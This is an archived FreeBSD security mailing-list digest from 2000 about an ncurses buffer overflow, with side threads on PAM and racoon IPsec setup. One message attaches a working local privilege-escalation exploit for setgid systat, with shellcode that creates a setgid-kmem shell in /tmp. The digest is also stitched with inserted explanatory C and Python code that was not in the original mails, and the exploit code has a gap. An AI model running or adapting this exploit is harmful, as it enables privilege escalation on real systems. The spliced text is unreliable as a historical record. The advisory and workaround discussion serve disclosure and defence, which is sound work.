The function tparm() returns a control string for screen manipulation, originating from the terminfo file read according to the environment variables TERM and TERMINFO_DIRS. Even though ncurses implementations on some platforms reportedly ignore TERMINFO_DIRS while running setuid/setgid, they check ~/.terminfo/ for the capability files in any case. OPT_SIZE seems to be defined as 512. tparm() can be made to return a string of arbitrary length containing arbitrary data, so exploitation is usually quite trivial. There are a few similar strcpy() calls in other functions in the file.
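The pattern just quoted, as an added example that is not part of the advisory or of the ncurses source: an unbounded copy of a capability string into a 512-byte stack buffer next to a bounded replacement, plus the credential check that keeps a set-id process from honouring ~/.terminfo at all. OPT_SIZE, the function names and the 750-byte constructed capability are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define OPT_SIZE 512                  /* the advisory's figure for ncurses' buffer */

/* The flagged pattern: tparm() output (attacker-chosen when the terminfo
 * entry comes from ~/.terminfo) copied with strcpy() into a fixed stack
 * buffer.  A capability longer than OPT_SIZE-1 bytes overwrites the saved
 * frame of a setuid/setgid caller.  Only ever call this with short input. */
size_t vulnerable_mvcur_copy(const char *cap)
{
    char use[OPT_SIZE];
    (void)strcpy(use, cap);           /* no bound check, as in the advisory */
    return strlen(use);
}

/* Bounded replacement: refuse a capability that would not fit instead of
 * truncating it (a cut escape sequence is still a bug, just a quieter one).
 * Returns the length copied, or -1 when the caller must move the cursor
 * some other way. */
int bounded_mvcur_copy(char *use, size_t usesz, const char *cap)
{
    size_t n = strlen(cap);
    if (n >= usesz)
        return -1;
    memcpy(use, cap, n + 1);
    return (int)n;
}

/* The other half of the fix: a set-id process must not honour terminfo
 * locations the user controls (TERMINFO, TERMINFO_DIRS, ~/.terminfo).
 * Decide from credentials, not from the environment. */
int user_terminfo_allowed(uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    return uid == euid && gid == egid;
}

/* Constructed stand-in for the attacker's capability string: `len` bytes
 * of filler, which is what an over-long "cup" entry delivers to tparm(). */
char *make_capability(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

/* Try the bounded copy with a capability of the given length. */
int try_bounded_copy(size_t len)
{
    char use[OPT_SIZE];
    char *cap = make_capability(len);
    int r = cap ? bounded_mvcur_copy(use, sizeof use, cap) : -2;
    free(cap);
    return r;
}

int main(void)
{
    const char *benign = "\033[10;20H";          /* ordinary VT100 cursor move */

    printf("benign (%zu bytes): %d\n", strlen(benign), try_bounded_copy(strlen(benign)));
    printf("largest that fits: %d\n", try_bounded_copy(OPT_SIZE - 1));
    printf("one byte too long: %d\n", try_bounded_copy(OPT_SIZE));
    printf("750-byte entry:    %d\n", try_bounded_copy(750));
    /* vulnerable_mvcur_copy() with the 750-byte entry would smash the stack;
     * only the benign string is passed to it here. */
    printf("unbounded copy, benign input: %zu\n", vulnerable_mvcur_copy(benign));
    printf("honour ~/.terminfo at uid 1000 / euid 0: %d\n",
           user_terminfo_allowed(1000, 0, 1000, 1000));
    return 0;
}
```

The length check and the credential check are independent: the first stops the overflow whatever the terminfo source, the second stops a set-id program from reading attacker-controlled terminfo in the first place, which also covers the other strcpy() sites the advisory mentions but does not list.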
Many other ncurses functions may also call the cursor moving functions (e.g. endwin()) so in order to be vulnerable, a program needn't call mvcur().

SOLUTION

The authors of ncurses and OS vendors were informed over a week ago and they have released, or will shortly release, fix packages.

TEMPORARY WORKAROUND

A temporary solution is to remove the setuid/setgid bits of programs using ncurses. To check if a program uses ncurses, type (on most systems):

ldd /path/to/program

If libncurses or libocurses is mentioned in the library listing and the program is setuid/setgid, then there's a possibility for it to be exploited. If 'ldd' doesn't exist on the system (or the program is statically linked) you can try something like

grep -li TERMINFO /path/to/program

If it outputs the file path, the program probably uses ncurses or a derivative. To remove the setuid/setgid bits, issue the command:

chmod ug-s /path/to/file

CREDITS AND ACKNOWLEDGEMENTS

Vulnerability discovered by: Jouko Pynnönen
Thanks and greets to: Emil Valsson (for providing a FreeBSD test box), Esa Etelävuori, ncurses people, cc-opers@IRCNet

- --
Jouko Pynnönen Online Solutions Ltd Secure your Linux - jouko@solutions.fi http://www.secmod.com

------- End of Forwarded Message

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Oct 10 7: 5:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 16F0537B503 for ; Tue, 10 Oct 2000 07:05:48 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA51626; Tue, 10 Oct 2000 21:04:53 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 10 Oct 2000 21:04:53 +0700 (NSS) From: Max Khon To: "Nick A.
Leuta" Cc: FreeBSD-Security Subject: Re: PAM help needed In-Reply-To: <00bb01c032ab$3ee9ccc0$131fa8c0@skynick> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 10 Oct 2000, Nick A. Leuta wrote: > > > My questions are: > > > a. Is any of my assumptions/conclusions wrong? > > > b. Is there any work done on the subject to fix it? > > > c. How stable is PAM on FreeBSD? > > > d. Any known problems that you know from your experience? > > I do not know of any problems with PAM under FreeBSD. > > Seems that FreeBSD PAM library is taken without any > > significant modifications from Linux PAM 0.65 distribution. > > Yes, it's true. But unlike FreeBSD, under Linux RH 6.x distribution all > applications like login, passwd, su, vlock, xdm, xlock, xscreensaver (in > /etc/pam.d also mentioned shutdown, xsaver...) using pam. to support passwd we should add support for this to our modules. Seems that nobody really wanted to have such functionality (I haven't seen patches for this). same thing with su. do not know about X stuff. > ...Do FreeBSD's pam_* modules realize all known (auth, account, session, > password) "module-types"? no. 
most modules implement only auth (and some of them implement account) module types /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7: 8:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178]) by hub.freebsd.org (Postfix) with SMTP id 2B79137B66E for ; Tue, 10 Oct 2000 07:07:55 -0700 (PDT) Received: (qmail 21794 invoked from network); 10 Oct 2000 14:08:00 -0000 Received: from lagoon.freebsd.lublin.pl (qmailr@212.182.115.11) by yeti.ismedia.pl with SMTP; 10 Oct 2000 14:08:00 -0000 Received: (qmail 5703 invoked from network); 10 Oct 2000 14:08:03 -0000 Received: from riget.scene.pl (qmailr@212.182.115.2) by lagoon.freebsd.lublin.pl with SMTP; 10 Oct 2000 14:08:03 -0000 Received: (qmail 35965 invoked by uid 1001); 10 Oct 2000 14:07:37 -0000 Date: Tue, 10 Oct 2000 16:07:37 +0200 From: Przemyslaw Frasunek To: freebsd-security@freebsd.org Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010160736.N94343@riget.scene.pl> References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="x+6KMIRAuhnl3hBn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --x+6KMIRAuhnl3hBn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > For those of you who don't subscribe to BUGTRAQ, here's a heads up. And the exploit (in attachment). 
-- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

Attachment: systat.sh (application/x-sh)

#!/bin/csh

##############################################################################
# (c) 2000 Przemysław Frasunek                                               #
#                                                                            #
# FreeBSD 4.x systat gid=kmem exploit                                        #
# Idea by: Jouko Pynnönen                                                    #
#                                                                            #
# Dedicated to ksm.                                                          #
#                                                                            #
# I was bored at school, so I wrote this exploit during English class. :)    #
##############################################################################

cat << __EOF__ > /tmp/xx
#!/bin/csh

cp /bin/csh /tmp
/usr/sbin/chgrp kmem /tmp/csh
chmod 2755 /tmp/csh
__EOF__

chmod 755 /tmp/xx

cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>      /* the three header names were lost in the archive; */
#include <unistd.h>     /* stdio.h and unistd.h are what the code below needs */

#define OFF -400
#define ALIGN 516

long getesp(void)
{
 __asm__("movl %esp, %eax\n");
}

int main(void)
{
 /* precompiled malformed terminfo binary */

 char evilcap[] =
 "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
 "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
 "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
 "\x6d\x69\x6e\x61\x6c";

 char retbuf[5];
 long ret = getesp() + OFF;
 int i;

 write(2, evilcap, sizeof(evilcap)-1);
 for (i=0;i<39;i++) write(2, "\0", 1);
 for (i=0;i<86;i++) write(2, "\xff", 1);
 write(2, "\0\0", 2);
 for (i=0;i<750;i++) write(2, "\xff", 1);
 /* [archive gap: the text between "i" and "> 8)" on the next line was
    lost; it held the ALIGN padding loop and the start of the
    sprintf(retbuf, ...) call that packs `ret` byte by byte] */
 for (i=0;i> 8),
 (((int)ret & 0xff0000) >> 16),
 (((int)ret & 0xff000000) >> 24));
 write(2, retbuf, 5);
}
__EOF__

cc -o /tmp/s /tmp/sploitte.c
cd $HOME
mkdir -p .terminfo/s
setenv TERM screen
/tmp/s >& .terminfo/s/screen
setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
/usr/bin/systat >& /dev/null
rm -f .terminfo/s/screen
ls -la /tmp/csh
rm -f /tmp/xx /tmp/s /tmp/sploitte.c

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Oct 10 7:53:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id 81C8037B503 for ; Tue, 10 Oct 2000 07:53:10 -0700 (PDT) Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id VAA21620; Tue, 10 Oct 2000 21:50:28 +0700 (NOVST) Message-ID: <39E32CB4.651CAE3F@sentry.granch.ru> Date: Tue, 10 Oct 2000 21:50:28 +0700 From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: Przemyslaw Frasunek Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> <20001010160736.N94343@riget.scene.pl> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Przemyslaw Frasunek wrote:
>
> On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> > For those of you who don't subscribe to BUGTRAQ, here's a heads up.
>
> And the exploit (in attachment).
>

Press any key to continue...sentry:[shelton] 150>sh systat.sh
setenv: not found
systat.sh: 69: Syntax error: Bad fd number
Press any key to continue...

-- With Best Regards. Rashid N.
Achilov (RNA1-RIPE), Brainbench ID: 28514 Granch Ltd. lead engineer, e-mail: achilov@granch.ru tel/fax (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 9: 2:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bongo.rbc.ru (bongo.rbc.ru [195.218.138.120]) by hub.freebsd.org (Postfix) with ESMTP id ED59D37B66D for ; Tue, 10 Oct 2000 09:02:20 -0700 (PDT) Received: from bingo.rbc.ru (bingo.rbc.ru [195.218.138.28]) by bongo.rbc.ru (Postfix) with ESMTP id DD2A614FB4 for ; Tue, 10 Oct 2000 20:02:15 +0400 (MSD) Received: from igor ([195.218.167.26]) by bingo.rbc.ru (8.9.3/8.9.3) with SMTP id UAA12878 for ; Tue, 10 Oct 2000 20:02:15 +0400 (MSD) (envelope-from igorp@mail.rbc.ru) Message-ID: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> From: "Igor" To: Subject: racoon problem Date: Tue, 10 Oct 2000 20:03:21 +0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00B0_01C032F5.23DD5CE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Disposition-Notification-To: "Igor" X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. 
I configured ipsec and racoon:

#ipsec.conf
spdadd 1.1.1.1 2.2.2.2 any -P out ipsec esp/transport/1.1.1.1-2.2.2.2/require ;
spdadd 2.2.2.2 1.1.1.1 any -P in ipsec esp/transport/2.2.2.2-1.1.1.1/require ;

setkey -f ipsec.conf

#racoon.conf
path pre_shared_key "psk" ;
log debug4;
remote anonymous
{
        exchange_mode aggressive,main,base;
        identifier address;
        proposal_check obey;
        lifetime time 24 hour ; # sec,min,hour
        lifetime byte 100 MB ;  # B,KB,GB
        # phase 1 proposal (for ISAKMP SA)
        proposal {
                encryption_algorithm des ;
                hash_algorithm sha1;
                authentication_method pre_shared_key ;
                dh_group 2;
        }
}
# phase 2 proposal (for IPsec SA)
sainfo anonymous
{
        pfs_group 2;
        lifetime time 12 hour ;
        lifetime byte 50 MB ;
        encryption_algorithm des ;
        authentication_algorithm hmac_md5, hmac_sha1 ;
        compression_algorithm deflate ;
}

racoon -f racoon.conf

#psk
1.1.1.1         12345678
2.2.2.2         12345678

on phase 2
00-10-04 16:22:05: pfkey.c:193:pfkey_handler(): get pfkey ADD message
2000-10-04 16:22:05: pfkey.c:209:pfkey_handler(): pfkey ADD failed Invalid argument

I think the password for crypt packets must be established at this time.
What is wrong?
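A lint pass over the configuration posted above, as an added example for this archive; it is not code from the racoon or KAME projects nor from the poster. It parses the posted racoon.conf into its remote/sainfo/proposal blocks and reports the algorithm choices a practitioner would question today (single DES in both phases and HMAC-MD5 in phase 2; which algorithms count as weak is this example's own assumption), and it checks that every spdadd policy in ipsec.conf has a mirror-image entry for the opposite direction, a routine sanity check on hand-written SPD files. The two sample configs are copied from the question; the parser and the weak-algorithm list are constructed here. The thread does not say what caused the pfkey ADD failure, and this example does not claim to.

```python
"""Lint a KAME racoon.conf / setkey policy pair for weak algorithm choices
and asymmetric SPD entries.  Added example for the archived thread; not
part of racoon.  Sample inputs are copied from the posted question."""
import re

# Constructed sample: the setkey policy file exactly as posted.
IPSEC_CONF = """
spdadd 1.1.1.1 2.2.2.2 any -P out ipsec esp/transport/1.1.1.1-2.2.2.2/require ;
spdadd 2.2.2.2 1.1.1.1 any -P in ipsec esp/transport/2.2.2.2-1.1.1.1/require ;
"""

# Constructed sample: racoon.conf exactly as posted.
RACOON_CONF = """
path pre_shared_key "psk" ;
log debug4;
remote anonymous
{
        exchange_mode aggressive,main,base;
        identifier address;
        proposal_check obey;
        lifetime time 24 hour ; # sec,min,hour
        lifetime byte 100 MB ;  # B,KB,GB
        # phase 1 proposal (for ISAKMP SA)
        proposal {
                encryption_algorithm des ;
                hash_algorithm sha1;
                authentication_method pre_shared_key ;
                dh_group 2;
        }
}
# phase 2 proposal (for IPsec SA)
sainfo anonymous
{
        pfs_group 2;
        lifetime time 12 hour ;
        lifetime byte 50 MB ;
        encryption_algorithm des ;
        authentication_algorithm hmac_md5, hmac_sha1 ;
        compression_algorithm deflate ;
}
"""

# Assumption of this example: algorithms a practitioner would reject today.
WEAK = {"des": "56-bit single DES", "hmac_md5": "MD5-based integrity"}


def tokenize(text):
    """Drop '#' comments, then split into braces, ';' and bare words."""
    text = re.sub(r"#.*", "", text)
    return re.findall(r"[{};]|[^\s{};]+", text)


def parse_blocks(tokens):
    """Return (block_path, key, values) for every 'key values ;' statement.
    block_path is the nesting of block headers, e.g. ('remote anonymous', 'proposal')."""
    stmts, stack, cur = [], [], []
    for tok in tokens:
        if tok == "{":                       # the words before '{' name the block
            stack.append(" ".join(cur))
            cur = []
        elif tok == "}":
            stack.pop()
            cur = []
        elif tok == ";":
            if cur:
                values = [v for word in cur[1:] for v in word.split(",") if v]
                stmts.append((tuple(stack), cur[0], values))
            cur = []
        else:
            cur.append(tok)
    return stmts


def weak_algorithms(stmts):
    """Every *_algorithm statement whose value is in WEAK, with its block path."""
    findings = []
    for path, key, values in stmts:
        if key.endswith("_algorithm"):
            for alg in values:
                if alg in WEAK:
                    findings.append(("/".join(path) or "<top>", key, alg, WEAK[alg]))
    return findings


SPD_RE = re.compile(r"spdadd\s+(\S+)\s+(\S+)\s+(\S+)\s+-P\s+(in|out)\s+ipsec\s+(\S+)")


def spd_asymmetries(text):
    """Each 'out' policy src->dst should have an 'in' policy dst->src, and vice
    versa; return the (src, dst, direction) entries that are missing."""
    entries = {(m.group(1), m.group(2), m.group(4)) for m in SPD_RE.finditer(text)}
    missing = []
    for src, dst, direction in sorted(entries):
        mirror = (dst, src, "in" if direction == "out" else "out")
        if mirror not in entries:
            missing.append(mirror)
    return missing


def lint(ipsec_conf=IPSEC_CONF, racoon_conf=RACOON_CONF):
    return {
        "weak": weak_algorithms(parse_blocks(tokenize(racoon_conf))),
        "missing_spd": spd_asymmetries(ipsec_conf),
    }


if __name__ == "__main__":
    report = lint()
    for path, key, alg, why in report["weak"]:
        print(f"weak: {path}: {key} {alg} ({why})")
    for src, dst, direction in report["missing_spd"]:
        print(f"missing SPD entry: spdadd {src} {dst} ... -P {direction}")
```

On the posted files the SPD check passes (both directions are present) and the lint reports DES in the phase 1 proposal, DES in the phase 2 sainfo, and hmac_md5 in the phase 2 authentication list.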
From owner-freebsd-security Tue Oct 10 11: 5:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from femail1.sdc1.sfba.home.com (femail1.sdc1.sfba.home.com [24.0.95.81]) by hub.freebsd.org (Postfix) with ESMTP id 7534A37B66D for ; Tue, 10 Oct 2000 11:05:13 -0700 (PDT)
Received: from mthompson.home.net ([24.7.95.143]) by femail1.sdc1.sfba.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001010180500.EDDL6495.femail1.sdc1.sfba.home.com@mthompson.home.net> for ; Tue, 10 Oct 2000 11:05:00 -0700
Message-Id: <4.3.2.7.2.20001010110133.00cf6b60@mail.smateo1.sfba.home.com>
X-Sender: mpthompson@mail.smateo1.sfba.home.com
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 10 Oct 2000 11:01:48 -0700
To: freebsd-security@freebsd.org
From: Mike Thompson
Subject: Re: Encrypted IP tunneling solution
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sorry, no URL yet. I'll put the code up on a server and send the URL out
later this week. I just wanted to gauge the interest and it seems that
there is at least some mild interest in the code.

Mike

At 02:04 PM 10/9/00 -0700, Mikko Tyolajarvi wrote:
>Hi,
>
>I wouldn't mind having a look, as I need something like this to access
>my home machine from my laptop (among other things).
>
>But I see no URL :-)
>
>        Regards,
>        /Mikko
>
>In local.freebsd-security you write:
>
> >I've created a fairly simple little application called stun that
> >[...]
>
> >If you are interested, let me know. I'm more than happy to share it, but I
> >[...]
>
> >where a virtual NDIS VxD driver or some similar beast will have to be
>
>Yuk!
>-- 
>  Mikko Työläjärvi_______________________________________mikko@rsasecurity.com
>  RSA Security

From owner-freebsd-security Tue Oct 10 16:58:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 930BC37B66C for ; Tue, 10 Oct 2000 16:58:29 -0700 (PDT)
Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id QAA10133; Tue, 10 Oct 2000 16:58:28 -0700 (PDT)
Received: by grok.example.net (Postfix, from userid 1000) id BCAFD21316E; Tue, 10 Oct 2000 16:59:08 -0700 (PDT)
Date: Tue, 10 Oct 2000 16:59:08 -0700
From: Steve Reid
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010165908.C9112@grok>
References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Tue, Oct 10, 2000 at 07:02:30AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> For those of you who don't subscribe to BUGTRAQ, here's a heads up.

I tried it on a 4.1-R box and a 4.1.1-R box, with the same results both
times:

steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x  1 steve  wheel  622908 Oct 10 16:47 /tmp/csh

So there is arbitrary code being executed to copy csh to /tmp and set
it setgid, but I am in group wheel already, so no gain (it should be
group kmem). Either systat gives up privs before the Bad Stuff happens,
or the exploit is just a proof-of-concept designed to not work for
script kiddies.

What about top? It is linked to ncurses too. I tried changing the script
to use top instead of systat but got this:

steve@grok:/home/steve% ./exploit.csh
ls: /tmp/csh: No such file or directory

So either top is not exploitable or the exploit needs to be modified for
top.

I would `chmod g-s /usr/bin/systat /usr/bin/top` until we know for sure.

From owner-freebsd-security Tue Oct 10 17: 2:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 50DE137B66D for ; Tue, 10 Oct 2000 17:02:19 -0700 (PDT)
Received: (qmail 28267 invoked by uid 1001); 11 Oct 2000 00:02:34 -0000
Date: Wed, 11 Oct 2000 03:02:34 +0300
From: Peter Pentchev
To: achilov@granch.ru
Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001011030234.B28063@ringwraith.office1.bg>
References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> <20001010160736.N94343@riget.scene.pl> <39E32CB4.651CAE3F@sentry.granch.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <39E32CB4.651CAE3F@sentry.granch.ru>; from shelton@sentry.granch.ru on Tue, Oct 10, 2000 at 09:50:28PM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 09:50:28PM +0700, Rashid N. Achilov wrote:
> Przemyslaw Frasunek wrote:
> > 
> > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> > > For those of you who don't subscribe to BUGTRAQ, here's a heads up.
> > 
> > And the exploit (in attachment).
> > 
> 
> Press any key to continue...sentry:[shelton] 150>sh systat.sh
> setenv: not found
> systat.sh: 69: Syntax error: Bad fd number
> Press any key to continue...

Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running
it with 'sh'?

G'luck,
Peter

-- 
No language can express every thought unambiguously, least of all this one.

From owner-freebsd-security Tue Oct 10 17: 7:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 7F96537B66D for ; Tue, 10 Oct 2000 17:07:35 -0700 (PDT)
Received: (qmail 4275 invoked by uid 1000); 11 Oct 2000 00:11:01 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 00:11:01 -0000
Date: Tue, 10 Oct 2000 19:11:01 -0500 (CDT)
From: Mike Silbersack
To: Steve Reid
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To: <20001010165908.C9112@grok>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 10 Oct 2000, Steve Reid wrote:

> On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> > For those of you who don't subscribe to BUGTRAQ, here's a heads up.
> 
> I tried it on a 4.1-R box and a 4.1.1-R box, with the same results both
> times:
> 
> steve@grok:/home/steve% ./exploit.csh
> -rwxr-sr-x  1 steve  wheel  622908 Oct 10 16:47 /tmp/csh
> 
> So there is arbitrary code being executed to copy csh to /tmp and set
> it setgid, but I am in group wheel already, so no gain (it should be
> group kmem). Either systat gives up privs before the Bad Stuff happens,
> or the exploit is just a proof-of-concept designed to not work for
> script kiddies.

Well, the advisory states that ncurses 5.0 and before are vulnerable. It
looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
safe.

(The exploit didn't work for me either, FWIW.)

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 10 17:10:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 586FF37B66C for ; Tue, 10 Oct 2000 17:10:07 -0700 (PDT)
Received: (qmail 4285 invoked by uid 1000); 11 Oct 2000 00:13:34 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 00:13:34 -0000
Date: Tue, 10 Oct 2000 19:13:33 -0500 (CDT)
From: Mike Silbersack
To: Steve Reid
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 10 Oct 2000, Mike Silbersack wrote:

> Well, the advisory states that ncurses 5.0 and before are vulnerable. It
> looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
> from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
> safe.
> 
> (The exploit didn't work for me either, FWIW.)
> 
> Mike "Silby" Silbersack

I partially retract that. It looks like 3.x doesn't use ncurses, if I'm
reading cvs properly.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 10 17:38:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 64E7837B502; Tue, 10 Oct 2000 17:38:28 -0700 (PDT)
Received: from localhost (8nurpp@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e9B0cH562984; Tue, 10 Oct 2000 20:38:20 -0400 (EDT) (envelope-from green@FreeBSD.org)
Message-Id: <200010110038.e9B0cH562984@green.dyndns.org>
X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4
To: Peter Pentchev
Cc: achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To: Message from Peter Pentchev of "Wed, 11 Oct 2000 03:02:34 +0300." <20001011030234.B28063@ringwraith.office1.bg>
